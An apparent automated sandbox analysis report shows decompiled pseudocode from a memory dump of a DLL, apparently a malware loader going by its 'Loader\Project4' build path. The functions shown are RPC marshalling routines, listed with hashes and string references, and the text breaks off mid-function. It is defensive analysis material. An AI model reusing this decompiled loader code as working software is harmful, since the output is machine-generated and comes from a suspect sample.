                                                                                              • String ID:
                                                                                              • API String ID: 3272661963-0
                                                                                              • Opcode ID: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                                                                              • Instruction ID: 88b098f1539f08df6dee2951bb44ee62bc7572b1891c100f3a3d81e12d825a95
                                                                                              • Opcode Fuzzy Hash: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                                                                              • Instruction Fuzzy Hash: 5EF04FF1A48741AEE7029770AE1BB9A3B64A715309F104939F142BA1E2C6BC04158B3F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 53%
                                                                                              			E6F1D5070(void* __eflags, int _a4, intOrPtr _a8, signed short* _a12) {
                                                                                              				signed char* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				intOrPtr _t121;
                                                                                              				intOrPtr _t123;
                                                                                              				intOrPtr _t129;
                                                                                              				intOrPtr _t166;
                                                                                              				void* _t204;
                                                                                              				void* _t206;
                                                                                              
                                                                                              				_v8 = 0;
                                                                                              				_v16 = 0;
                                                                                              				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                              				_v32 = 0;
                                                                                              				_v24 = 0;
                                                                                              				_v20 = 0;
                                                                                              				_v28 = 0;
                                                                                              				0x6f1d0000("(%p,%p,%p)\n", _a4, _a8, _a12);
                                                                                              				E6F1D73B0(_a4 + 0x14, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
                                                                                              				_t206 = _t204 + 0x18;
                                                                                              				if( *((intOrPtr*)(_a4 + 0x30)) == 0) {
                                                                                              					_t166 = _a4;
                                                                                              					_t212 =  *((intOrPtr*)(_t166 + 0x6c));
                                                                                              					if( *((intOrPtr*)(_t166 + 0x6c)) == 0) {
                                                                                              						_v36 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                              						_v12 =  *((intOrPtr*)(_a4 + 0x14));
                                                                                              						 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                              						E6F1D5070(_t212, _a4, _a8, _a12);
                                                                                              						 *((intOrPtr*)(_a4 + 0x30)) = _v36;
                                                                                              						 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
                                                                                              						_v32 = 1;
                                                                                              						0x6f1d0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x6c)) - _v12);
                                                                                              						_t206 = _t206 + 8;
                                                                                              						 *((intOrPtr*)(_a4 + 0x14)) = _v12;
                                                                                              					}
                                                                                              				}
                                                                                              				_a12 =  &(_a12[2]);
                                                                                              				if( *_a12 != 0) {
                                                                                              					_v8 = _a12 +  *_a12;
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				if(( *_a12 & 0x0000ffff) != 0) {
                                                                                              					_v16 = _a12 + ( *_a12 & 0x0000ffff);
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
                                                                                              				if(_v8 != 0) {
                                                                                              					_t129 = _a4;
                                                                                              					0x6f1d0000(_t129, _a12);
                                                                                              					_v40 = _t129;
                                                                                              					E6F1DCC40( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
                                                                                              					_t206 = _t206 + 0x18;
                                                                                              					_v20 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                              					_v24 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                              					_v28 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              				}
                                                                                              				_t121 = E6F1D8B40(_a4, _a8, _a12, _v16);
                                                                                              				_a8 = _t121;
                                                                                              				if(_v8 != 0) {
                                                                                              					 *((intOrPtr*)(_a4 + 0x3c)) = _v20;
                                                                                              					 *((intOrPtr*)(_a4 + 0x44)) = _v24;
                                                                                              					 *((intOrPtr*)(_a4 + 0x40)) = _v28;
                                                                                              					_t121 = E6F1DCE70( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
                                                                                              				if(_v32 == 0) {
                                                                                              					return _t121;
                                                                                              				} else {
                                                                                              					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 0x6c));
                                                                                              					_t123 = _a4;
                                                                                              					 *((intOrPtr*)(_t123 + 0x6c)) = 0;
                                                                                              					return _t123;
                                                                                              				}
                                                                                              			}

                                                                                              APIs
                                                                                              • _NdrComplexStructBufferSize@12.RGSBZEOG(00000000,00000000,00000000), ref: 6F1D511E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: BufferComplexSize@12Struct
                                                                                              • String ID: (%p,%p,%p)$difference = 0x%x
                                                                                              • API String ID: 1319815426-1308788287
                                                                                              • Opcode ID: 9513c4d5056cd174a8b54ae7318da83859a6cb3a00a73bea5f4b9a4b33ab83c3
                                                                                              • Instruction ID: bd4b52f81162a8df8462198767ff0c53216f6e1156bb1c8555b8d6c55845cc29
                                                                                              • Opcode Fuzzy Hash: 9513c4d5056cd174a8b54ae7318da83859a6cb3a00a73bea5f4b9a4b33ab83c3
                                                                                              • Instruction Fuzzy Hash: F981D6B4A00209EFDB08CF59C890AAE7BB5FF88354F108559F8199B345D735EA51CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 62%
                                                                                              			E6F1D3FC0(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                              				signed int _v5;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				signed int _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _t96;
                                                                                              				intOrPtr _t110;
                                                                                              				void* _t172;
                                                                                              				void* _t173;
                                                                                              				void* _t176;
                                                                                              
                                                                                              				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_t173 = _t172 + 0x14;
                                                                                              				if(( *_a12 & 0x000000ff) == 0x1f || ( *_a12 & 0x000000ff) == 0x20) {
                                                                                              					_v5 = (_a12[1] & 0x000000ff) + 1;
                                                                                              					if(( *_a12 & 0x000000ff) != 0x1f) {
                                                                                              						_a12 =  &(_a12[2]);
                                                                                              						_v16 =  *_a12;
                                                                                              						_a12 =  &(_a12[4]);
                                                                                              						_v12 =  *_a12;
                                                                                              						_a12 =  &(_a12[4]);
                                                                                              					} else {
                                                                                              						_a12 =  &(_a12[2]);
                                                                                              						_v16 =  *_a12 & 0x0000ffff;
                                                                                              						_a12 =  &(_a12[2]);
                                                                                              						_v12 =  *_a12 & 0x0000ffff;
                                                                                              						_a12 =  &(_a12[2]);
                                                                                              					}
                                                                                              					_v28 =  *_a12 & 0x0000ffff;
                                                                                              					_a12 =  &(_a12[2]);
                                                                                              					_a12 = E6F1DA540(_v12, _a4, _a12, _v12);
                                                                                              					E6F1D73D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
                                                                                              					_t96 = E6F1DAEC0(_v28,  *((intOrPtr*)(_a4 + 0x44)));
                                                                                              					_t176 = _t173 + 0x1c;
                                                                                              					_v20 = _t96;
                                                                                              					_v32 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              						_a16 = 1;
                                                                                              					}
                                                                                              					_t133 = _a16 & 0x000000ff;
                                                                                              					if((_a16 & 0x000000ff) != 0) {
                                                                                              						_t110 = E6F1DA3B0(_t133, _a4, _v16);
                                                                                              						_t176 = _t176 + 8;
                                                                                              						 *_a8 = _t110;
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              					_v24 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                              					E6F1DAF00(_a4, _v20);
                                                                                              					E6F1DC2B0(_a4, _v24,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                              					E6F1E00E0( *_a8 + _v32, _v24, _v20);
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					0x6f1d0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                              					 *0x6f1d0000(0x6e6);
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: (%p, %p, %p, %d)$invalid format type %x
                                                                                              • API String ID: 4104443479-658257468
                                                                                              • Opcode ID: e870aec31d8424ae788882f3134c0ae2cabc59b7f851ad83a53327fa5bac8b49
                                                                                              • Instruction ID: e9ff8b554b0ffc11dfc2539802c0ed4451d5b49fe9e0262fb41bff38fb035b33
                                                                                              • Opcode Fuzzy Hash: e870aec31d8424ae788882f3134c0ae2cabc59b7f851ad83a53327fa5bac8b49
                                                                                              • Instruction Fuzzy Hash: 566180B5A043499FCB08CF58C890AAF7BB6FF89344F048559F9198B345D731EA61CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E6F1D5640(int _a4, WCHAR* _a8, signed char* _a12) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				void* _t72;
                                                                                              				intOrPtr _t73;
                                                                                              
                                                                                              				_v8 = 0;
                                                                                              				0x6f1d0000("(%p,%p,%p)\n", _a4, _a8, _a12);
                                                                                              				if(( *_a12 & 0x000000ff) != 0x21) {
                                                                                              					0x6f1d0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                              					return  *0x6f1d0000(0x6e6);
                                                                                              				}
                                                                                              				if( *((intOrPtr*)(_a4 + 0x30)) == 0 &&  *((intOrPtr*)(_a4 + 0x6c)) == 0) {
                                                                                              					_v12 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                              					_v28 =  *((intOrPtr*)(_a4 + 0x14));
                                                                                              					_v24 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                              					_v20 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              					_v16 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                              					E6F1D5640(_a4, _a8, _a12);
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = _v12;
                                                                                              					 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
                                                                                              					_v8 = 1;
                                                                                              					 *((intOrPtr*)(_a4 + 0x44)) = _v16;
                                                                                              					 *((intOrPtr*)(_a4 + 0x40)) = _v20;
                                                                                              					 *((intOrPtr*)(_a4 + 0x3c)) = _v24;
                                                                                              					 *((intOrPtr*)(_a4 + 0x14)) = _v28;
                                                                                              				}
                                                                                              				E6F1DCC40(0x21, _a4, _a8, _a12);
                                                                                              				_t72 = E6F1DCE70(0x21, _a4, _a8, _a12, 1);
                                                                                              				if(_v8 != 0) {
                                                                                              					_t73 =  *((intOrPtr*)(_a4 + 0x6c));
                                                                                              					 *((intOrPtr*)(_a4 + 0x14)) = _t73;
                                                                                              					 *((intOrPtr*)(_a4 + 0x6c)) = 0;
                                                                                              					return _t73;
                                                                                              				}
                                                                                              				return _t72;
                                                                                              			}












                                                                                              APIs
                                                                                              • _NdrComplexArrayBufferSize@12.RGSBZEOG(00000001,?,?), ref: 6F1D5704
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ArrayBufferComplexSize@12
                                                                                              • String ID: (%p,%p,%p)$invalid format type %x
                                                                                              • API String ID: 3462415225-814374321
                                                                                              • Opcode ID: c4ab28e6d682c5aa531e47f8e44533f63dd5ca71890c50459637c7e4cc8da1d2
                                                                                              • Instruction ID: 45be1c6d6f7ba067f6e7ef86e201149a8f5e5f4d9d0fe3e7d9b4d077e5242730
                                                                                              • Opcode Fuzzy Hash: c4ab28e6d682c5aa531e47f8e44533f63dd5ca71890c50459637c7e4cc8da1d2
                                                                                              • Instruction Fuzzy Hash: 9841D8B9A04209EFDB44CF48D490AAA7BB5FF88394F108159FD488B385D771EA91CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 76%
                                                                                              			E6F1DDCB4(void* __ebx, void* __edi, void* __esi) {
                                                                                              				signed short _t55;
                                                                                              				intOrPtr _t57;
                                                                                              				void* _t65;
                                                                                              				intOrPtr _t67;
                                                                                              				intOrPtr _t69;
                                                                                              				void* _t103;
                                                                                              				void* _t105;
                                                                                              				void* _t109;
                                                                                              				void* _t110;
                                                                                              
                                                                                              				 *(_t103 - 1) = ( *( *((intOrPtr*)(_t103 + 0x14)) + (1 << 0)) & 0x000000ff) + 1;
                                                                                              				 *((intOrPtr*)(_t103 + 0x14)) = E6F1DA440( *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)) + 4);
                                                                                              				 *((intOrPtr*)(_t103 + 0x14)) = E6F1DA540( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
                                                                                              				_t55 =  *(_t103 + 0xc);
                                                                                              				0x6f1d0000(_t55,  *((intOrPtr*)(_t103 + 0x14)));
                                                                                              				 *(_t103 - 8) = _t55;
                                                                                              				_t92 =  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c));
                                                                                              				_t57 = E6F1DAEC0( *(_t103 - 8) & 0x0000ffff,  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
                                                                                              				_t109 = _t105 + 0x24;
                                                                                              				 *((intOrPtr*)(_t103 - 0x14)) = _t57;
                                                                                              				_t112 =  *(_t103 + 0x20) & 0x000000ff;
                                                                                              				if(( *(_t103 + 0x20) & 0x000000ff) == 0) {
                                                                                              					_push(0xab4);
                                                                                              					E6F1DFA34(__ebx, _t92, __edi, __esi, _t112, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\0f112985b53f4edb9cf175c98caa4d9d\\Loader\\Project4\\Project4\\Source.c");
                                                                                              					_t109 = _t109 + 0xc;
                                                                                              				}
                                                                                              				if(( *(_t103 + 0x18) & 0x000000ff) == 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) == 0) {
                                                                                              					 *(_t103 + 0x18) = 1;
                                                                                              				}
                                                                                              				if(( *(_t103 + 0x18) & 0x000000ff) != 0) {
                                                                                              					_t69 = E6F1DA3B0( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x14)));
                                                                                              					_t109 = _t109 + 8;
                                                                                              					 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) = _t69;
                                                                                              				}
                                                                                              				E6F1D73D0( *(_t103 + 0xc) + 4,  *(_t103 + 0xc) + 4,  *(_t103 - 1) & 0x000000ff);
                                                                                              				_t110 = _t109 + 8;
                                                                                              				 *((intOrPtr*)(_t103 - 0x10)) =  *((intOrPtr*)( *(_t103 + 0xc) + 4));
                                                                                              				 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10))));
                                                                                              				 *((intOrPtr*)(_t103 - 0x28)) =  *((intOrPtr*)( *(_t103 + 0xc) + 0x44));
                                                                                              				 *((intOrPtr*)(_t103 - 0x1c)) = 0;
                                                                                              				while( *((intOrPtr*)(_t103 - 0x1c)) <  *((intOrPtr*)(_t103 - 0x28))) {
                                                                                              					_t67 = E6F1D9560( *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0x14)), 0,  *(_t103 + 0x18) & 0x000000ff);
                                                                                              					_t110 = _t110 + 0x14;
                                                                                              					 *((intOrPtr*)(_t103 - 0x20)) = _t67;
                                                                                              					 *((intOrPtr*)(_t103 - 0x1c)) =  *((intOrPtr*)(_t103 - 0x1c)) + 1;
                                                                                              				}
                                                                                              				_t65 =  *((intOrPtr*)( *(_t103 + 0xc) + 4)) -  *((intOrPtr*)(_t103 - 0x10));
                                                                                              				return _t65;
                                                                                              			}













                                                                                              APIs
                                                                                              • __wassert.LIBCMT ref: 6F1DDD3B
                                                                                                • Part of subcall function 6F1DFA34: GetModuleHandleExW.KERNEL32(00000006,?,?), ref: 6F1DFAF9
                                                                                                • Part of subcall function 6F1DFA34: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6F1DFB25
                                                                                              Strings
                                                                                              • C:\xampp\htdocs\Loct\0f112985b53f4edb9cf175c98caa4d9d\Loader\Project4\Project4\Source.c, xrefs: 6F1DDD31
                                                                                              • fUnmarshall, xrefs: 6F1DDD36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Module$FileHandleName__wassert
                                                                                              • String ID: C:\xampp\htdocs\Loct\0f112985b53f4edb9cf175c98caa4d9d\Loader\Project4\Project4\Source.c$fUnmarshall
                                                                                              • API String ID: 1832359313-3937532760
                                                                                              • Opcode ID: a1346543a665db19d442750cdfb2106e942137e6b249c59e48aff77c25b1ff44
                                                                                              • Instruction ID: 7a9c455b8c71d21ad1746b57f57fcd74f0eef257afdd04cfa074c6723c09063f
                                                                                              • Opcode Fuzzy Hash: a1346543a665db19d442750cdfb2106e942137e6b249c59e48aff77c25b1ff44
                                                                                              • Instruction Fuzzy Hash: EA4153B5A00249AFCF04CF68D850A9E7BB5AF59348F148159F919AB381D335EA21CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 64%
                                                                                              			E6F1D34D0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _t67;
                                                                                              				void* _t100;
                                                                                              				void* _t102;
                                                                                              				void* _t103;
                                                                                              
                                                                                              				_v12 = _a12[2] & 0x0000ffff;
                                                                                              				0x6f1d0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				E6F1D73D0(_a12, _a4 + 4, (_a12[1] & 0x000000ff) + 1);
                                                                                              				_t102 = _t100 + 0x1c;
                                                                                              				_t71 = _a16 & 0x000000ff;
                                                                                              				if((_a16 & 0x000000ff) == 0) {
                                                                                              					if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              						 *_a8 =  *((intOrPtr*)(_a4 + 4));
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t67 = E6F1DA3B0(_t71, _a4, _v12);
                                                                                              					_t102 = _t102 + 8;
                                                                                              					 *_a8 = _t67;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              				_v8 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                              				E6F1DAF00(_a4, _v12);
                                                                                              				_t103 = _t102 + 8;
                                                                                              				if(( *_a12 & 0x000000ff) == 0x16) {
                                                                                              					E6F1DC2B0(_a4, _v8,  *_a8,  &(_a12[4]), _a16 & 0x000000ff);
                                                                                              					_t103 = _t103 + 0x14;
                                                                                              				}
                                                                                              				0x6f1d0000("copying %p to %p\n", _v8,  *_a8);
                                                                                              				if( *_a8 != _v8) {
                                                                                              					E6F1E00E0( *_a8, _v8, _v12);
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}










                                                                                              APIs
                                                                                              • _memmove.LIBCMT ref: 6F1D35E7
                                                                                                • Part of subcall function 6F1DA3B0: _memset.LIBCMT ref: 6F1DA3CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memmove_memset
                                                                                              • String ID: (%p,%p,%p,%d)$copying %p to %p
                                                                                              • API String ID: 3555123492-1064448161
                                                                                              • Opcode ID: 5f6ec411a51042b50059c325514bc1ecc2020d0159bf5aeb3f04058c3d1f0d4f
                                                                                              • Instruction ID: 27b270700e478237dcc8b44cd2ca25d364e270baff021451cafca761454811cb
                                                                                              • Opcode Fuzzy Hash: 5f6ec411a51042b50059c325514bc1ecc2020d0159bf5aeb3f04058c3d1f0d4f
                                                                                              • Instruction Fuzzy Hash: 0C413EB9604248ABCB04CF98D891DAE7BB6EF89344F10C159FC599B345D731FA61CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 53%
                                                                                              			E6F1D4580(void* __eflags, signed int _a4, void* _a8, signed short* _a12, signed int _a16) {
                                                                                              				signed int _v5;
                                                                                              				signed char _v6;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				char _v20;
                                                                                              				void* _t95;
                                                                                              				void* _t99;
                                                                                              
                                                                                              				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_a12 =  &(_a12[0]);
                                                                                              				_v6 =  *_a12 & 0xf;
                                                                                              				_v5 = ( *_a12 & 0xf0) >> 4;
                                                                                              				_a12 =  &(_a12[0]);
                                                                                              				E6F1D73D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
                                                                                              				_v16 = E6F1DE930( *((intOrPtr*)(_a4 + 4)), _v6 & 0x000000ff,  *((intOrPtr*)(_a4 + 4)));
                                                                                              				0x6f1d0000("got switch value 0x%x\n", _v16);
                                                                                              				_t99 = _t95 + 0x2c;
                                                                                              				_v12 = ( *_a12 & 0x0000ffff) + (_v5 & 0x000000ff);
                                                                                              				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              					_a16 = 1;
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					 *_a8 =  *0x6f1d0000(_a4, _v12 & 0x0000ffff);
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					E6F1E0730( *_a8, 0, _v12 & 0x0000ffff);
                                                                                              					_t99 = _t99 + 0xc;
                                                                                              				}
                                                                                              				E6F1D77F0(_a4, _a8,  &_v6, 0);
                                                                                              				_v20 = (_v5 & 0x000000ff) +  *_a8;
                                                                                              				return E6F1DED20(_a4,  &_v20, _v16, _a12, 0);
                                                                                              			}











                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p, %p, %p, %d)$got switch value 0x%x
                                                                                              • API String ID: 2102423945-3216196450
                                                                                              • Opcode ID: ac1899642e74ec24c99006ed2853161e1568077c4c3c091b35a598ad6f0c86ad
                                                                                              • Instruction ID: d3801ca73d44efb1354eda691664c434026bd644696cbd12f55c995953ae08ce
                                                                                              • Opcode Fuzzy Hash: ac1899642e74ec24c99006ed2853161e1568077c4c3c091b35a598ad6f0c86ad
                                                                                              • Instruction Fuzzy Hash: 8541B3B5904298ABCB00CFA4D850ABF7BB5AF49305F04C189FD559B385D735E620CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 21%
                                                                                              			E6F1D99D4() {
                                                                                              				void* _t246;
                                                                                              				void* _t248;
                                                                                              				void* _t250;
                                                                                              
                                                                                              				L0:
                                                                                              				while(1) {
                                                                                              					L0:
                                                                                              					 *(_t246 + 0xc) =  *(_t246 + 0xc) + (( *(_t246 + 0x10))[1] & 0x000000ff);
                                                                                              					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
                                                                                              					 *(_t246 - 8) =  &(( *(_t246 + 0x10))[ *( *(_t246 + 0x10))]);
                                                                                              					 *((intOrPtr*)(_t246 - 0x18)) = E6F1DE3A0( *((intOrPtr*)(_t246 + 8)),  *(_t246 - 8));
                                                                                              					0x6f1d0000("embedded complex (size=%d) => %p\n",  *((intOrPtr*)(_t246 - 0x18)),  *(_t246 + 0xc));
                                                                                              					_t250 = _t248 + 0x14;
                                                                                              					if(( *(_t246 + 0x18) & 0x000000ff) != 0) {
                                                                                              						E6F1E0730( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_t246 - 0x14)) =  *((intOrPtr*)(0x6f1eb3d8 + ( *( *(_t246 - 8)) & 0x7f) * 4));
                                                                                              					if( *((intOrPtr*)(_t246 - 0x14)) == 0) {
                                                                                              						0x6f1d0000("no unmarshaller for embedded type %02x\n",  *( *(_t246 - 8)) & 0x000000ff);
                                                                                              						_t250 = _t250 + 8;
                                                                                              					} else {
                                                                                              						if(( *( *(_t246 - 8)) & 0x000000ff) != 0x2f) {
                                                                                              							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)), _t246 + 0xc,  *(_t246 - 8), 0);
                                                                                              						} else {
                                                                                              							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc),  *(_t246 - 8), 0);
                                                                                              						}
                                                                                              					}
                                                                                              					 *(_t246 + 0xc) =  *(_t246 + 0xc) +  *((intOrPtr*)(_t246 - 0x18));
                                                                                              					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
                                                                                              					L1:
